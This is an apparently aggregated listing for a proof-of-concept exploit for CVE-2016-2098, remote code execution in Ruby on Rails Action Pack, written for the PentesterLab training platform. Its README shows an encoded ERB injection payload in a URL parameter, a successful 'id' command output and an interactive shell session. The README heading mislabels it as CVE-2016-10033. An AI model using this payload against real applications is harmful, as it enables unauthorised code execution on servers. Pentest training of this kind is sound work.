CVE-2016-2098 PoC — Ruby on Rails Action Pack 安全漏洞

Source

https://github.com/sealldeveloper/CVE-2016-2098-PoC

Associated Vulnerability

Title:Ruby on Rails Action Pack 安全漏洞 (CVE-2016-2098)
Description:Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.

Description

A PoC of CVE-2016-2098 I made for PentesterLab

Readme

# CVE-2016-10033-PoC

Wrote this for PentesterLab

> If you are from PentesterLab's don't cheat, it's alot better to learn.

Hope it's useful to someone, if not to me in the future :)

Has interactive shell, nice argparse stuff asw

## Usage
```
usage: script.py [-h] --url URL [--param PARAM] [--proxy] [--raw] [--no-color]
script.py: error: the following arguments are required: --url
```

## Example
```bash
$ python3 script.py --url "http://localhost:8000/pages?id=test"
[+] No parameter specified. Available parameters: ['id']
[+] Testing parameter: id
[+] Testing injection with URL: http://localhost:8000/pages?id[inline]=%3C%25%3D%20%25x%28echo%20SEALLDEV_OUTPUT_%24%28id%29%29%20%25%3E
[+] Injection successful! Test output: uid=1000(webrick) gid=1000(webrick) groups=1000(webrick)
[+] Starting interactive shell...
[+] Type "exit" to quit
--------------------------------------------------
shell> whoami
webrick
```

File Snapshot


 [4.0K]  /data/pocs/ef1c651540049f5fb0972e755466d533fb7b0e5c
├── [ 34K]  LICENSE
├── [ 928]  README.md
├── [  88]  requirements.txt
└── [5.9K]  script.py

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!